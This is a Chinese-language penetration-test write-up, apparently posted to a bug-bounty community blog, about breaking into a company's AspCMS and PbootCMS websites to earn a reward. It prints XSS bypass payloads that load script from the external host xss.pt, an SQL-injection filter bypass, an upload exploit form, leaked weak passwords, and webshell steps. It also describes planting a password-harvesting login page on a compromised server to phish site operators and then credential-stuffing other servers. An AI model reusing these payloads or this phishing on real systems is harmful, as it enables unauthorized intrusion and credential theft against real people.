為了冰箱貼的一次滲透測試

語言: CN / TW / HK

作者:貝米少年

在漏洞盒子看到冰箱貼不錯 刷點站

目標:還是建站系統(因為建站系統的客戶基本都做seo 大概都是在權1左右 正好達標)

Nmap 掃一下埠 看到8888知道是寶塔 終於不是虛機了。。。 3389開啟

image-20210514091556782

嘗試訪問一下888/pma 8080 8888 8080訪問不了

image-20210514093509769

image-20210514093441790

image-20210514093855741

whatweb.bugscaner.com 查詢一下伺服器資訊 得知 aspcms

image-20210514093843802

檢視旁站 tools.ipip.net/ 點進去看了幾個 全是ASPCMS

image-20210514094027205

試了一下網上的exp 都沒有存在 應該都被修復了吧 後臺也沒找到

找到一個框框,嘗試XSS 被攔了

image-20210514101639201

image-20210514101729885

使用不常見標籤bypass 還是被攔了

burpsuite fuzz 找到幾個200 的

image-20210514103223758

在先知找了幾個bypass payload 還是有過濾了

<video onkeyup=setTimeout'al\x65rt\x28/2/\x29'''>
<svg onmouseover=setTimeout'al\x65rt\x28/233/\x29'''>

image-20210514103314099

實體16進位制編碼

<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xss.pt/aNWy"></sCrIpT>>

以上實體16進位制編碼進行一次URL編碼

%3Ciframe%20WIDTH%3D0%20HEIGHT%3D0%20srcdoc%3D%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%26%23x3C%3B%26%23x73%3B%26%23x43%3B%26%23x52%3B%26%23x69%3B%26%23x50%3B%26%23x74%3B%26%23x20%3B%26%23x73%3B%26%23x52%3B%26%23x43%3B%26%23x3D%3B%26%23x22%3B%26%23x68%3B%26%23x74%3B%26%23x74%3B%26%23x70%3B%26%23x73%3B%26%23x3A%3B%26%23x2F%3B%26%23x2F%3B%26%23x78%3B%26%23x73%3B%26%23x73%3B%26%23x2E%3B%26%23x70%3B%26%23x74%3B%26%23x2F%3B%26%23x61%3B%26%23x4E%3B%26%23x57%3B%26%23x79%3B%26%23x22%3B%26%23x3E%3B%26%23x3C%3B%26%23x2F%3B%26%23x73%3B%26%23x43%3B%26%23x72%3B%26%23x49%3B%26%23x70%3B%26%23x54%3B%26%23x3E%3B%3E

結果 xss沒插進去 發現這兒好像可以執行SQL語句

image-20210514105258779

旁站也是aspcms的 那個站一直跳轉 用這個站嘗試一下留言處注入把 返回500 沒什麼辦法

image-20210514115830774

image-20210514115851699

找到一個移動端的留言板 插入<Img sRC=https://xss.pt/aNWyp.jpg%3E 沒被攔

image-20210514141111422

image-20210514141129088

注入有點問題 沒有回顯 dnslog也沒有 換個點

image-20210514141744724

下載一個最新版本 找一下配置漏洞 發現之前的爆出來的資料庫洩露 但是現在是這樣了

image-20210514112421301

Layer挖到些好東西 發現好多微擎cms的 找到幾個註冊點全都要稽核

image-20210514142833176

image-20210514142913985

又找了一個 輸入admin/ 自動跳轉 嘗試弱口令無果 去google一下漏洞把

image-20210514143024376

版本太高 之前漏洞已經不存在 。。。。。 註冊的賬號 聯絡客服根本都不在阿 md

他們後臺都自定義改過了 找一下客服人員跟他們要一下演示站點看看

image-20210524124944049

沒看懂他說的啥意思。。。。 這個人是個aspcms老使用者了 aspcms官網有個技術群 這個技術群做了一個phootcms

image-20210524125115169

發現他其他伺服器上有phootcms 去找找弱口令 下載他那個PbootCMS 發現有一個data目錄 訪問並下載

image-20210524125255282

預設安裝的資料庫 後臺地址改過了

image-20210524130023624

更新時間是2021 密碼解出來是123456 但是有密碼找不到後臺

image-20210524130354083

去某漏洞庫翻一下 CVE-2018-16356 是個注入 api.php/List/index?order=123 先(select )

image-20210525163238310

輸入一個select 肯定攔截 他是有兩層 先過寶塔 sel%0aect 空格字元是可以繞過的 防注入他是寫在程式碼層的

沒找到他防注入規則寫在哪了 找找其他的旁站 發現一個漏網之魚預設賬號密碼

後臺模板新增一句話連上shell 用蟻劍bypass disable_functions

image-20210526122615996

image-20210526122740947

連線.antproxy.php 密碼還是之前shell的密碼 發現可以執行命令了

image-20210526123007009

找找後臺路徑和弱口令好滲透其他伺服器

image-20210526123121646

找一個aspcms 或者pbootcms的站點 得知後臺路徑admin5566.php 去目標站點看一下

image-20210526123329255

sqlite資料庫

image-20210526125514964

在static/backup/sql/下載資料檔案

image-20210526132921112

image-20210526142859856

收集弱口令去撞庫 這是在他網站裡找到的弱口令

admin999mnmn

[email protected]

admin999ioio adminklkl777

admin666yuyu

admin666888ty

admin999mlml

通過弱口令進入另一個伺服器的後臺

image-20210527092357927

後臺GETSHELL 利用0day 修改白名單配置檔案

登入後臺->全域性配置->配置引數->立刻提交,使用burp抓包。

在POST資料中新增一個:home_upload_ext=php 欄位

參考:https://www.anquanke.com/post/id/222849#h2-7

image-20210527092953669

image-20210527092816195

上傳檔案exp:upload.html

<!DOCTYPE html>

<html lang="en">

<head>

 <meta charset="UTF-8">  

<title>pbootcms檔案上傳</title>

</head>

<body>

<form action="http://xxxxx/?member/upload" method="post" enctype="multipart/form-data">

<input type="file" name="upload">

<input type="submit" name="mufile">

</form>

</body>

</html>

上傳不上去 利用1day檔案包含 上傳張圖片馬 然後包含 結果被攔了

image-20210527120108778

pbootcms本人太菜沒法shell 還有個辦法就是繼續撞庫 我是廢物沒辦法

在拿到shell的伺服器上找另一個cms的站 在登陸寫一個收取輸入的密碼

image-20210531170059449

在模板上新增幾個違禁詞 然後告訴他們

image-20210531170207287

image-20210531170234354

然後去撞庫 成功登陸

image-20210531170341786

拿webshell 上傳白名單拿不下 新增php黑名單 phtml 等不解析 nginx

image-20210601152131377

撞到了另一個cms 登陸後臺 看到有編輯模板功能 結果關閉了

image-20210601152803620

新增字尾 沒有用

image-20210601153057365

img

內建 沒啥用

image-20210616173219933

emmmm.... 搞不下 去找找其他點 我是真廢物

回到上面第一次撞庫成功的那個cms 發現一個重灌漏洞

找到站內資源 刪除抓包

image-20210621102444766

修改刪除路徑就行了

image-20210621102555504

QQ截圖20210628144516

高版本沒有這個洞 然後訪問重灌 結果遠端呼叫資料庫的時候一直空白 不知道怎麼回事下期再說吧!!!

總結:

1.主站a伺服器全是aspcms 網上的漏洞都試過了可能存在 但是 d盾繞不過去 通過網站名稱 法人名稱 666 123 888 這些爆破出後臺地址

2.去找旗下的網站和伺服器 先是通過弱口令拿到b伺服器的後臺然後webshell

2.再是解密去撞a 和 c伺服器的庫 成功撞到c伺服器的庫 拿到pbootcms的後臺賬號密碼 沒辦法shell

3.拿到c伺服器下的pbootcms的後臺賬號密碼 沒辦法shell 另一個cms解密解不開通過釣魚得到弱口令去撞庫

4.得到c伺服器的某後臺然後發現重灌漏洞 遠端呼叫資料庫的時候不生效 !

極簡簡約動態分割線本週六快手聯合火線 舉辦線下「觀火」白帽沙龍活動 ↓掃描二維碼火速瞭解解碼未來活動banner

【火線Zone】

火線Zone是**[火線安全平臺]運營的封閉式社群,社群成員必須在[火線安全平臺]提交有效漏洞才能申請免費加入,**符合要求的白帽子可聯絡[火小表妹]免費加入~

我們不希望出現劣幣驅逐良幣的結果,我們不希望一個技術社群變成一個水區!

歡迎具備分享精神的白帽子加入火線Zone,共建一個有技術氛圍的優質社群!

指紋識別簡約卡片動態二維碼 (2)

引導分享點贊在看GIF引導三連